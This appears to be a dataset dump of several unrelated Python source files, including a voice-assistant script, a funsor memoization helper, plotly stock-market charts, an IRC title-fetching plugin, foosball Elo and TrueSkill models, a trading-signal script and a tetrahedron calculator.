print(\"\")\n os.startfile(codepath)\n\n elif 'next' in query:\n music_dir = 'C:\\\\Users\\\\ayush\\\\OneDrive\\\\Desktop\\\\AYUSHMAAN\\\\musics\\\\English'\n songs = os.listdir(music_dir)\n os.startfile(os.path.join(music_dir, songs[random.randrange(0,len(songs))]))\n \n elif 'developer' in query:\n speak(\"I was developed by Ayushmaan on 21 OCtober 2020\")\n\n elif 'who are you' in query:\n speak(\"I am an Assistant which does not contain any AI or ML techniques but still can help you\")\n\n elif 'help' in query:\n speak(\"I can help you with the mentioned things\")\n print(\"Wikipedia,Amazon,Google,PlayMusic,Time,Open code, who are you,new,\\n At End to close say quit\")\n speak(\"I can search for you in Wikipedia, I can open Amazon ,I can Open Youtube ,I can Play Music ,I can tell you time and many more\")\n \n\n elif 'new' in query:\n webbrowser.open(\"aajtak.in\")\n \n\n elif 'quit' in query:\n speak(\"Hold it don't go \")\n speak(\"Meet you Soon Sir\")\n 
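# stop the assistant process with a clean exit\n 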
exit(0)\n","sub_path":"DAY3/alex_by_ayushmaan/alex(need-to-change-code-for-diff-pc).py","file_name":"alex(need-to-change-code-for-diff-pc).py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"499001421","text":"# Copyright Contributors to the Pyro project.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom collections import Hashable\nfrom contextlib import contextmanager\n\nimport funsor.interpreter as interpreter\n\n\n@contextmanager\ndef memoize(cache=None):\n \"\"\"\n Exploit cons-hashing to do implicit common subexpression elimination\n \"\"\"\n if cache is None:\n cache = {}\n\n @interpreter.interpretation(interpreter._INTERPRETATION) # use base\n def memoize_interpretation(cls, *args):\n key = (cls,) + tuple(id(arg) if (type(arg).__name__ == \"DeviceArray\") or not isinstance(arg, Hashable)\n else arg for arg in args)\n if key not in cache:\n cache[key] = cls(*args)\n return cache[key]\n\n with interpreter.interpretation(memoize_interpretation):\n yield cache\n","sub_path":"funsor/memoize.py","file_name":"memoize.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"122407738","text":"from plotly.offline import init_notebook_mode,iplot\nimport plotly.graph_objs as go\nimport plotly.io as pio\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport sqlite3\n\ninit_notebook_mode(connected=True)\n\n#########\nconn = sqlite3.connect('cn_stocks.db')\n\ntoday_all_changepercent_over_0 =pd.read_sql('select changepercent from today_all where volume>0 and changepercent<11 and changepercent>0',conn)\n\nhist_data_today_all_changepercent_over_0 = np.histogram(today_all_changepercent_over_0['changepercent'],bins=10,range=(0,11))\n\ntoday_all_changepercent_less_0 =pd.read_sql('select changepercent from today_all where volume>0 and changepercent>-11 and changepercent<0',conn)\n\nhist_data_today_all_changepercent_less_0 = np.histogram(today_all_changepercent_less_0['changepercent'],bins=10,range=(-10.5,0))\n\n# first chart plots arable land from 1990 to 2015 in top 10 economies \n# as a line chart\nprint(sum(hist_data_today_all_changepercent_over_0[0]))\nprint(sum(hist_data_today_all_changepercent_less_0[0]))\n\ngraph_one = []\ngraph_one.append(\ngo.Bar(\nx=(hist_data_today_all_changepercent_over_0[1]),\ny=hist_data_today_all_changepercent_over_0[0],\nname=u'{}只上涨'.format(sum(hist_data_today_all_changepercent_over_0[0])),\ntext=hist_data_today_all_changepercent_over_0[0],\ntextposition = 'outside',\nmarker=dict(\ncolor='#d10031',\n)\n)\n)\n\ngraph_one.append(\ngo.Bar(\nx=(hist_data_today_all_changepercent_less_0[1]),\ny=hist_data_today_all_changepercent_less_0[0],\nname=u'{}只下跌'.format(sum(hist_data_today_all_changepercent_less_0[0])),\ntext=hist_data_today_all_changepercent_less_0[0],\ntextposition = 'outside',\nmarker=dict(\ncolor='#02c927',\n)\n)\n)\n\nlabels = [str(s)+'%' for s in range(-10,11)]\ntickvals = [s for s in range(-10,11)]\nlayout_one = dict(title = u'市场表现',\n xaxis=go.layout.XAxis(title=u'幅度',ticktext=labels,tickvals=tickvals),\n yaxis = dict(title = '数量',tick0=0, dtick=100)\n )\n\nfig = go.Figure(data=graph_one, layout=layout_one)\niplot(fig)\npio.write_image(fig, '/Users/roy/Desktop/fig1.png', width=600, height=350, scale=2)\n\n########\nstocks_60 =pd.read_sql('select * from stocks_60_days',conn)\n\nstats = {}\nfor n,g in stocks_60.groupby('date'):\n stats.setdefault(n,{})\n 
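# tally, per trading day, how many stocks closed up or down at least 5%\n 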
stats[n].setdefault('over_5%',0)\n stats[n].setdefault('less_5%',0)\n stats[n]['over_5%'] = len(g[g.p_change>=5.0])\n stats[n]['less_5%'] = len(g[g.p_change<=-5.0])\n\ndata = pd.DataFrame.from_dict(stats, orient='index')\n\n\ndata = data[-20:]\ngraph_two = []\ngraph_two.append(\ngo.Bar(\nx=data.index,\ny=data['over_5%'],\nname=u'上升超5%',\ntext=data['over_5%'],\ntextposition = 'auto',\ntextfont=dict(\nfamily='Arial',\nsize=3,\ncolor='#000000',\n),\nmarker=dict(\ncolor='#d10031',\n),\nopacity=0.5\n)\n)\n\ngraph_two.append(\ngo.Bar(\nx=data.index,\ny=data['less_5%'],\nname=u'下跌超5%',\ntext=data['less_5%'],\ntextposition = 'auto',\ntextfont=dict(\nfamily='Arial',\nsize=3,\ncolor='#000000',\n),\nmarker=dict(\ncolor='#02c927',\n),\nopacity=0.5\n)\n)\n\nlabels = [d[:-9] for d in data.index]\ntickvals = data.index\n\nlayout_two = dict(title = u'市场表现二',\n xaxis=go.layout.XAxis(ticktext=labels,tickvals=tickvals,tickangle=-90),\n yaxis = dict(title = '数量',tick0=0, dtick=100),\n )\nfig = go.Figure(data=graph_two, layout=layout_two)\niplot(fig)\npio.write_image(fig, '/Users/roy/Desktop/fig2.png', width=600, height=350, scale=3)\n########\nstocks_60 = pd.read_sql('select * from stocks_60_days ORDER BY date',conn)\ntop_break_through = {}\ndown_break_through = {}\ncode_list = stocks_60['code'].unique().tolist()\nfor code in code_list:\n cur_stock = stocks_60[stocks_60.code==code].sort_values('date')\n top_break_dates = cur_stock[cur_stock.close>=cur_stock.max120]['date'].values.tolist()\n for date in top_break_dates:\n top_break_through.setdefault(date,[])\n top_break_through[date].append(code)\n\n down_break_dates = cur_stock[cur_stock.close<=cur_stock.min120]['date'].values.tolist()\n for date in down_break_dates:\n down_break_through.setdefault(date,[])\n down_break_through[date].append(code)\n\ntop_break_records = pd.DataFrame.from_dict(top_break_through,orient='index')\ntop_break_records.index = pd.to_datetime(top_break_records.index)\ntop_break_records = ~top_break_records.isnull()\ntop_break_records = top_break_records.sort_index().sum(axis=1)\n\ndown_break_records = pd.DataFrame.from_dict(down_break_through,orient='index')\ndown_break_records.index = pd.to_datetime(down_break_records.index)\ndown_break_records = ~down_break_records.isnull()\ndown_break_records = down_break_records.sort_index().sum(axis=1)\n\ndata = pd.concat([top_break_records,down_break_records],axis=1)\ndata.columns=['top_break','down_break']\ndata = data.fillna(0)\n\ndata = data[-20:]\ngraph_three = []\ngraph_three.append(\ngo.Bar(\nx=data.index,\ny=data['top_break'],\nname=u'创半年新高',\ntext=data['top_break'],\ntextposition = 'outside',\nmarker=dict(\ncolor='#d10031',\n)\n)\n)\n\ngraph_three.append(\ngo.Bar(\nx=data.index,\ny=data['down_break'],\nname=u'创半年新低',\ntext=data['down_break'],\ntextposition = 'outside',\nmarker=dict(\ncolor='#02c927',\n)\n)\n)\n\nlabels = [d.strftime('%m/%d') for d in data.index]\ntickvals = data.index\n\nlayout_three = dict(title = u'市场表现三',\n xaxis=go.layout.XAxis(ticktext=labels,tickvals=tickvals,tickangle=-90),\n yaxis = dict(title = '数量',tick0=0, dtick=100),\n )\nfig = go.Figure(data=graph_three, layout=layout_three)\niplot(fig)\npio.write_image(fig, '/Users/roy/Desktop/fig3.png', width=600, height=350, scale=3)\n########","sub_path":"plotly_static.py","file_name":"plotly_static.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"451032540","text":"from .plugin import Plugin\n\nfrom re import compile, 
IGNORECASE, MULTILINE, UNICODE, DOTALL\nfrom html import unescape\nimport requests \n\nfrom requests_futures.sessions import FuturesSession\nfrom requests.exceptions import RequestException\n\n\nclass TitlePlugin(Plugin):\n def __init__(self, config, client):\n client.register_listener(\"PRIVMSG\", self._handle_title)\n self._client = client\n self._pages = {}\n self._titles_fetched = False\n self._url_match = compile('https?://[^\\s/$.?#].[^\\s]*')\n self._title_match = compile('(.+)<\\/title>', IGNORECASE | MULTILINE | UNICODE)\n self._session = FuturesSession(max_workers=5)\n\n super(TitlePlugin, self).__init__(config)\n\n def _handle_title(self, nick, target, message, **rest):\n pages = self._url_match.findall(message)\n if pages:\n self._pages = {page: None for page in pages}\n self._titles_fetched = False\n\n if message.startswith(self._config['trigger']):\n if self._pages:\n self.send_command(nick=nick, target=target)\n\n def _handle_command(self, command):\n if command['target'].startswith(\"#\"):\n prefix = \"{nick}: \".format(**command)\n target = command['target']\n else:\n prefix = \"\"\n target = command['nick']\n\n multiple = len(self._pages) > 1\n\n if not self._titles_fetched:\n self._async_send_titles(prefix, target, self._pages.keys(), multiple)\n self._titles_fetched = True\n else:\n for page, title in self._pages.items():\n self._send_title(prefix, target, page, title, multiple)\n\n def _async_send_titles(self, prefix, target, pages, multiple):\n headers = {'User-Agent': 'Spixy IRC Bot'}\n for page in pages:\n try:\n head_request = requests.head(page, headers=headers)\n if \"text\" not in head_request.headers['Content-Type']:\n self._page = \"Error, no title found.\"\n return\n except:\n self._page = \"Error, no title found.\"\n return\n\n futures = [self._session.get(page, background_callback=self._title_callback(prefix, target, page, multiple), headers=headers)\n for page in pages]\n\n # Must \"join\" requests-futures requests for some odd reason.\n for future in futures:\n future.result()\n\n def _title_callback(self, prefix, target, page, multiple):\n def callback(session, response):\n try:\n response.raise_for_status()\n except RequestException:\n self._logger.exception(\"Got status {status} when retrieving {page}\".format(status=response.status_code,\n page=page))\n self._pages[page] = \"Error, status code {status}\".format(status=response.status_code)\n self._send_title(prefix, target, page, self._pages[page], multiple)\n return\n\n try:\n title = self._title_match.search(response.text).group(1)\n self._pages[page] = unescape(title)\n self._send_title(prefix, target, page, title, multiple)\n return\n except AttributeError:\n self._pages[page] = \"Error, no title found.\"\n self._send_title(prefix, target, page, self._pages[page], multiple)\n\n return callback\n\n def _send_title(self, prefix, target, page, title, multiple):\n if title is None:\n return\n\n if multiple:\n message = \"{prefix}{page} - {title}\".format(prefix=prefix, page=page, title=title)\n else:\n message = \"{prefix}{title}\".format(prefix=prefix, title=title)\n\n self._client.privmsg(target, message)\n","sub_path":"spixy/plugins/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605760391","text":"from protorpc import messages\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.ndb import msgprop\nfrom random import shuffle\nimport elo\nimport 
skill\n\nclass GameStatus(messages.Enum):\n active = 1\n complete = 2\n deleted = 3\n\nclass Position(messages.Enum):\n offense = 1\n defense = 2\n either = 3\n\nclass Side(messages.Enum):\n red = 1\n blue = 2\n\nclass Image(ndb.Model):\n data = ndb.BlobProperty(required=True)\n\nclass Player(ndb.Model):\n name = ndb.StringProperty(required=True)\n elo = ndb.IntegerProperty(required=True, default=1600)\n total_games = ndb.IntegerProperty(required=True, default=0)\n total_wins = ndb.IntegerProperty(required=True, default=0)\n image = ndb.KeyProperty(kind='Image')\n deleted = ndb.BooleanProperty(required=True, default=False)\n\n # TrueSkill\n mu = ndb.FloatProperty(required=True, default=skill.DEFAULT_MU)\n sigma = ndb.FloatProperty(required=True, default=skill.DEFAULT_SIGMA)\n\n def win_percentage(self):\n if self.total_games > 0:\n return round(float(self.total_wins) / self.total_games * 100, 2)\n else:\n return None\n\n def trueskill_rating(self):\n return skill.get_rating(self)\n\n def trueskill_gain(self, teammate, opponents):\n ratings = skill.update_ratings((self, teammate), opponents)[0][0]\n rating = skill.calculate_rating(ratings.mu, ratings.sigma)\n\n return rating - self.trueskill_rating()\n\n def trueskill_loss(self, teammate, opponents):\n ratings = skill.update_ratings(opponents, (self, teammate))[1][0]\n rating = skill.calculate_rating(ratings.mu, ratings.sigma)\n\n return self.trueskill_rating() - rating\n\nclass Game(ndb.Model):\n length = ndb.IntegerProperty(default=6)\n status = msgprop.EnumProperty(GameStatus, required=True)\n timestamp = ndb.DateTimeProperty(auto_now_add=True, required=True)\n\n # Players: (current positions)\n red_o = ndb.KeyProperty(kind='Player', required=True)\n red_d = ndb.KeyProperty(kind='Player', required=True)\n blue_o = ndb.KeyProperty(kind='Player', required=True)\n blue_d = ndb.KeyProperty(kind='Player', required=True)\n\n # Scores:\n red_shots = ndb.KeyProperty(kind='Shot', repeated=True)\n blue_shots = ndb.KeyProperty(kind='Shot', repeated=True)\n\n # Team Elo Ratings (at start of match):\n red_elo = ndb.IntegerProperty(required=True)\n blue_elo = ndb.IntegerProperty(required=True)\n\n # TrueSkill\n quality = ndb.IntegerProperty(required=True)\n\n def initialize(self, length, red_o, red_d, blue_o, blue_d):\n self.length = length\n self.status = GameStatus.active\n\n self.red_o = red_o\n self.red_d = red_d\n self.blue_o = blue_o\n self.blue_d = blue_d\n\n red_o = self.red_o.get()\n red_d = self.red_d.get()\n blue_o = self.blue_o.get()\n blue_d = self.blue_d.get()\n\n self.red_elo = (red_o.elo + red_d.elo) / 2\n self.blue_elo = (blue_o.elo + blue_d.elo) / 2\n\n self.quality = skill.calculate_quality((red_o, red_d), (blue_o, blue_d))\n\n def initialize_random(self, length, players):\n self.length = length\n self.status = GameStatus.active\n\n shuffle(players)\n self.red_o = players[0]\n self.red_d = players[1]\n self.blue_o = players[2]\n self.blue_d = players[3]\n\n red_o = self.red_o.get()\n red_d = self.red_d.get()\n blue_o = self.blue_o.get()\n blue_d = self.blue_d.get()\n\n self.red_elo = (red_o.elo + red_d.elo) / 2\n self.blue_elo = (blue_o.elo + blue_d.elo) / 2\n\n self.quality = skill.calculate_quality((red_o, red_d), (blue_o, blue_d))\n\n def initialize_matched(self, length, players):\n self.length = length\n self.status = GameStatus.active\n\n shuffle(players)\n p1 = players[0].get()\n p2 = players[1].get()\n p3 = players[2].get()\n p4 = players[3].get()\n\n red = (p1, p2)\n blue = (p3, p4)\n\n teams = {'red': red, 'blue': blue}\n 
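# try all three possible pairings and keep whichever maximizes TrueSkill match quality\n 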
quality = skill.calculate_quality(red, blue)\n\n r = (p1, p3)\n b = (p2, p4)\n q = skill.calculate_quality(r, b)\n if q > quality:\n teams = {'red': r, 'blue': b}\n quality = q\n\n r = (p1, p4)\n b = (p2, p3)\n q = skill.calculate_quality(r, b)\n if q > quality:\n teams = {'red': r, 'blue': b}\n quality = q\n\n red_o = teams['red'][0]\n red_d = teams['red'][1]\n blue_o = teams['blue'][0]\n blue_d = teams['blue'][1]\n\n self.red_o = red_o.key\n self.red_d = red_d.key\n self.blue_o = blue_o.key\n self.blue_d = blue_d.key\n\n self.red_elo = (red_o.elo + red_d.elo) / 2\n self.blue_elo = (blue_o.elo + blue_d.elo) / 2\n\n self.quality = quality\n\n def register_shot(self, player_key):\n \"\"\"\n Register a shot for the player with the specified key\n\n Raises an Exception if the key is invalid or the game\n is over\n \"\"\"\n\n # Get the side and position of the player who made the shot:\n side, position = self.side_and_position(player_key)\n\n if not side or not position:\n raise Exception(\"Error: invalid player\")\n\n # Create the shot record:\n shot = Shot(parent = self.key)\n shot.player = player_key\n shot.position = position\n shot.side = side\n\n # If red scored:\n if side == Side.red:\n shot.against = self.blue_d\n shot.put()\n self.red_shots.append(shot.key)\n\n # Red half time:\n if len(self.red_shots) == self.length/2:\n temp = self.red_o\n self.red_o = self.red_d\n self.red_d = temp\n\n # Mark game complete if over:\n if len(self.red_shots) >= self.length:\n self.status = GameStatus.complete\n\n # If blue scored:\n elif side == Side.blue:\n shot.against = self.red_d\n shot.put()\n self.blue_shots.append(shot.key)\n\n # Blue half time:\n if len(self.blue_shots) == self.length/2:\n temp = self.blue_o\n self.blue_o = self.blue_d\n self.blue_d = temp\n\n # Mark game complete if over:\n if len(self.blue_shots) >= self.length:\n self.status = GameStatus.complete\n\n # Adjust player's ratings if over:\n if self.is_complete():\n red_o = self.red_o.get()\n red_d = self.red_d.get()\n blue_o = self.blue_o.get()\n blue_d = self.blue_d.get()\n\n self.adjust_player_ratings(red_o, red_d, blue_o, blue_d)\n\n red_o.put()\n red_d.put()\n blue_o.put()\n blue_d.put()\n\n self.put()\n\n def adjust_player_ratings(self, red_o, red_d, blue_o, blue_d):\n winning_side = self.winning_side()\n if winning_side == None:\n return\n\n red_o.total_games += 1\n red_d.total_games += 1\n blue_o.total_games += 1\n blue_d.total_games += 1\n\n self.red_elo = (red_o.elo + red_d.elo) / 2\n self.blue_elo = (blue_o.elo + blue_d.elo) / 2\n\n if winning_side == Side.red:\n red_o.total_wins += 1\n red_d.total_wins += 1\n\n self.update_elo(red_o, red_d, self.red_elo, blue_o, blue_d, self.blue_elo)\n self.update_trueskill((red_o, red_d), (blue_o, blue_d))\n\n elif winning_side == Side.blue:\n blue_o.total_wins += 1\n blue_d.total_wins += 1\n\n self.update_elo(blue_o, blue_d, self.blue_elo, red_o, red_d, self.red_elo)\n self.update_trueskill((blue_o, blue_d), (red_o, red_d))\n\n else:\n raise Exception(\"Error: invalid winning side\")\n\n def update_elo(self, winner1, winner2, winner_elo, loser1, loser2, loser_elo):\n winner_points, loser_points = elo.calculate(winner_elo, loser_elo)\n\n winner1.elo = winner1.elo + winner_points\n winner2.elo = winner2.elo + winner_points\n\n loser1.elo = loser1.elo + loser_points\n loser2.elo = loser2.elo + loser_points\n\n def update_trueskill(self, winners, losers):\n winner_updates, loser_updates = skill.update_ratings(winners, losers)\n\n for i in range(len(winners)):\n winners[i].mu = 
winner_updates[i].mu\n winners[i].sigma = winner_updates[i].sigma\n\n for i in range(len(losers)):\n losers[i].mu = loser_updates[i].mu\n losers[i].sigma = loser_updates[i].sigma\n\n\n def side_and_position(self, player_key):\n \"\"\"\n Get the side and position of the specified player\n\n \"\"\"\n if player_key == self.red_o:\n return Side.red, Position.offense\n if player_key == self.red_d:\n return Side.red, Position.defense\n if player_key == self.blue_o:\n return Side.blue, Position.offense\n if player_key == self.blue_d:\n return Side.blue, Position.defense\n\n def is_complete(self):\n return self.status == GameStatus.complete\n\n def winning_side(self):\n if not self.is_complete():\n return None\n elif len(self.red_shots) == self.length:\n return Side.red\n else:\n return Side.blue\n\n def red_score(self):\n return len(self.red_shots)\n\n def blue_score(self):\n return len(self.blue_shots)\n\n def red_elo_points_to_gain(self):\n return elo.calculate(self.red_elo, self.blue_elo)[0]\n\n def blue_elo_points_to_gain(self):\n return elo.calculate(self.blue_elo, self.red_elo)[0]\n\nclass Shot(ndb.Model): # ancestor = Game => strongly consistent results\n player = ndb.KeyProperty(kind='Player', required=True)\n position = msgprop.EnumProperty(Position, required=True)\n side = msgprop.EnumProperty(Side, required=True)\n against = ndb.KeyProperty(kind='Player', required=True)\n timestamp = ndb.DateTimeProperty(auto_now_add=True, required=True)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"316703223","text":"\n\nfrom xai.brain.wordbase.nouns._lattice import _LATTICE\n\n#calss header\nclass _LATTICES(_LATTICE, ):\n\tdef __init__(self,): \n\t\t_LATTICE.__init__(self)\n\t\tself.name = \"LATTICES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"lattice\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_lattices.py","file_name":"_lattices.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"68569845","text":"import math\ns=str(input())\nS=list(s)\nn=len(S)\n#t=0\n#r=0\n# work without this also and if using it then change the range of first loop in range(0,r)\n# how many loop we need to go \n#for i in range(0,n):\n# t=t+i \n# if(t>n):\n# break\n# r=r+1\nfor i in range(0,n):\n for j in range(i,-1,-1):\n if(j<len(S)):\n print(S[j],end=\" \")\n elif(len(S)==0):\n break\n else:\n print(\"*\",end=\" \")\n print(\"\",end=\"\\n\")\n for k in range(0,i+1):\n if(len(S)>0):\n S.pop(0)\n if(len(S)==0):\n break\n","sub_path":"23-01-19/23-01.py","file_name":"23-01.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"421649332","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 21 05:26:28 2018\n\n@author: prem\n\"\"\"\n\nfrom datetime import timedelta\nfrom pytz import timezone\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC, LinearSVC, NuSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom collections import Counter\nimport talib\nimport statsmodels.api as sm\nimport numpy \nimport pandas as pd\n\ndef custom_split(string_list):\n \"\"\"\n Parses a string and returns it in list format, without the '[' ']' \n\n :params string_list: a list that's been 
made into string e.g. \"[ hello, hello2]\"\n :returns: a string that's been made into a list e.g. \"[hello, hello2]\" => [hello, hello2]\n \"\"\"\n # Remove the '[' and ']'\n string_list = string_list[1:-1].split(',')\n # Convert to float\n string_list = [float(s) for s in string_list]\n return string_list\n\ndef get_day_delta(current_date):\n \"\"\"\n Takes in the current date, checks it's day of week, and returns an appropriate date_delta\n E.g. if it's a Monday, the previous date should be Friday, not Sunday\n\n :params current_date: Pandas TimeStamp\n :returns: an int \n \"\"\"\n if current_date.isoweekday() == 1:\n return 3\n else:\n return 1\n\ndef fill_func(df, row, num_dates):\n \"\"\"\n Should be applied to every row of a dataframe. Reaches for the past thirty days of each dataframe,\n appends the data to a string, returns the string which should be unpacked later on.\n\n \"\"\"\n # Instantiate variables\n past_data = []\n # The current date is the name of the Series (row) being passed in \n current_date = row.name\n # print (\"current_date \", current_date)\n # Iterate through the number of dates from 0->num_dates\n for i in range(num_dates):\n # How many days to get back, calls get_day_delta for accurate delta assessment\n day_delta = get_day_delta(current_date)\n # print (\"day delta \", day_delta)\n # Get the current_date and update the current_date to minus day_delta from the date\n # To get the appropriate past date\n current_date = current_date - timedelta(days=day_delta)\n #print (\"changed current_date \", current_date)\n try:\n #: Get the price at the given current_date found by get_day_delta\n data = df.iloc[current_date]['sentiment']\n # print (\"current date \", current_date, \"data \" ,data)\n past_data.append(data)\n \n data = df.iloc[current_date]['sentiment high']- df.iloc[current_date]['sentiment low']\n past_data.append(data)\n \n data = df.iloc[current_date]['news volume']\n past_data.append(data)\n \n data = df.iloc[current_date]['news buzz']\n past_data.append(data)\n \n #print (\"past data \" ,past_data)\n except KeyError:\n #: No data for this date, pass\n pass\n # print str(past_data)\n \n # Return the a list made into a string\n return str(past_data)\n\ndef post_func(df): \n df = pd.DataFrame(df)\n df['past_data'] = df.apply(lambda row: fill_func(df, row, 99), axis=1)\n \n return df\n\ndef initialize(context):\n set_symbol_lookup_date('2018-10-21')\n ## Initialize list of securities we want to trade\n context.security_list = symbol('AAPL')\n \n ## Trailing stop loss\n context.stop_loss_pct = 0.995\n \n # We will weight each asset equally and leave a 5% cash\n # reserve. 
- actually, this is a sensible approach\n context.weight = 0.95 / len(context.security_list)\n \n context.investment_size = (context.portfolio.cash*context.weight) \n\n context.historical_bars = 100\n context.feature_window = 3\n \n schedule_function(myfunc, date_rules.every_day(), \n time_rules.market_open(hours=0, minutes=1))\n \ndef myfunc(context, data):\n price_history = data.history(context.security_list, fields=\"price\", bar_count=100, frequency=\"1d\")\n \n try: \n # Loop over each stock traded every day:\n for s in context.security_list:\n \n start_bar = context.feature_window\n price_list = price_history[s].tolist()\n past = data.current(s,'past_data')\n pastlist = custom_split(past)\n\n X = []\n y = []\n \n bar = start_bar\n \n # Loop for each machine learning data set\n while bar < len(price_list)-1:\n \n # print s,\" price: \",data.history(s, 'price', 100 , \"1d\")\n try: \n end_price = price_list[bar]\n start_price = price_list[bar-1]\n \n features = pastlist[(bar-3)*4: bar*4]\n # Features are the attribute values used for machine learning.\n #print(features)\n \n if end_price > start_price:\n label = 1\n else:\n label = -1\n # Label is the indicator of whether this stock will rise or fall\n bar +=1 \n \n X.append(features)\n y.append(label)\n \n #print X \n #print y\n \n except Exception as e:\n \n bar +=1\n print(('feature creation', str(e)))\n \n print ('len(X1)',len(X))\n \n # Instantiate the machine learning models\n clf1 = RandomForestClassifier(n_estimators=100)\n clf2 = LinearSVC()\n clf3 = NuSVC()\n clf4 = LogisticRegression()\n \n # Prepare the attribute information for prediction\n current_features=pastlist[384:396]\n \n X.append(current_features)\n print ('len(X2)',len(X))\n \n # Rescale all the data\n X = preprocessing.scale(X)\n \n current_features = X[-1:]\n X = X[:-1]\n \n #print current_features\n print ('len(X)',len(X))\n print ('len(y)',len(y))\n \n # Build the model\n clf1.fit(X,y)\n clf2.fit(X,y)\n clf3.fit(X,y)\n clf4.fit(X,y)\n \n # Predict the results \n p1 = clf1.predict(current_features)[0]\n p2 = clf2.predict(current_features)[0]\n p3 = clf3.predict(current_features)[0]\n p4 = clf4.predict(current_features)[0]\n \n # If at least 3 of the 4 models vote for the same result, that result is promoted to be the one used. 
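If fewer than three models agree, p stays 0 and no trade is placed.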
\n if Counter([p1,p2,p3,p4]).most_common(1)[0][1] >= 3:\n p = Counter([p1,p2,p3,p4]).most_common(1)[0][0]\n \n else: \n p = 0\n \n print(('Prediction',p)) \n \n current_price = data.current(s, 'price')\n current_position = context.portfolio.positions[s].amount\n cash = context.portfolio.cash\n \n open_orders = get_open_orders()\n \n # Everyday's trading activities: \n if (p == 1):\n if s not in open_orders:\n order_target_percent(s, context.weight, style=StopOrder(context.stop_loss_pct*current_price))\n cash-=context.investment_size\n elif (p == -1):\n if s not in open_orders:\n order_target_percent(s,-context.weight)\n \n except Exception as e:\n print(str(e)) \n\n\"\"\"\ndef handle_data(context, data):\n #Plot variables at the end of each day.\n \n long_count = 0\n short_count = 0\n\n for position in context.portfolio.positions.itervalues():\n if position.amount > 0:\n long_count += 1\n if position.amount < 0:\n short_count += 1\n \n record(num_long=long_count, num_short=short_count, leverage=context.account.leverage)\n\"\"\"","sub_path":"skrt.py","file_name":"skrt.py","file_ext":"py","file_size_in_byte":8600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"291649729","text":"#!/usr/bin/env python3.6\r\n#Author: Sebastian A. Ellefsen\r\nimport math\r\nimport sys\r\n\r\nclass FuckOff(Exception):\r\n def __init__(self, value):\r\n self.value = value\r\n def __str__(self):\r\n return repr(self.value)\r\n\r\ndef tetVol(height):\r\n volume = (math.sqrt(2)*(a(height)**3))/12\r\n return volume\r\n\r\ndef tetArea(height):\r\n area = math.sqrt(3)*(a(height)**2)\r\n return area\r\n\r\ndef a(height): # Added to follow DRY principle\r\n return (3/(math.sqrt(6)))*height\r\n\r\ni = input('Skriv inn en høyde: ')\r\n\r\ntry:\r\n i = float(i)\r\n\r\n if(i<0):\r\n raise FuckOff(\"Fuck off!\")\r\n\r\nexcept ValueError:\r\n print(i, 'er ikke et nummer!')\r\n exit()\r\nexcept FuckOff as err:\r\n print('An error occured:',err.value)\r\n exit()\r\nexcept:\r\n print('Something went horribly wrong:', sys.exec_info()[0])\r\n exit()\r\n\r\nprint('Et tetraheder med høyde', i, 'har volum', tetVol(i), 'og areal', tetArea(i))\r\n","sub_path":"oving_1/tetraeder.py","file_name":"tetraeder.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"627469150","text":"import logging\nimport models\nimport helpers\n\nclass GistPyObject(object):\n def __init__(self, gist):\n logging.info(\"New GistPyObject for id: %s\", gist.id)\n self.files = []\n self.id = gist.id\n self.url = gist.url\n self.owner = gist.owner\n self.description = gist.description\n for file in gist.files:\n self.files.append(File(file))\n\nclass File(object):\n def __init__(self, file):\n self.compilers = models.Compiler.get(keys=file.compilers)\n\n self.name = file.name\n self.language = file.language\n self.formatted_contents = file.formatted_contents\n self.contents = file.contents\n self.output = file.output\n self.id = file.id\n self.stylesheet = file.stylesheet\n self.output_url = file.output_url\n\n self.details = models.ResultDetails.get_by_key_name(helpers.make_key_name(\"result\", file.id))\n\nclass RunResultDetails(object):\n def __init__(self, details):\n self.datetime = details.datetime\n self.error = details.error\n self.langName = details.langName\n self.langVersion = details.langVersion\n self.langId = details.langId\n self.memory = details.memory\n self.output = details.output\n self.public = 
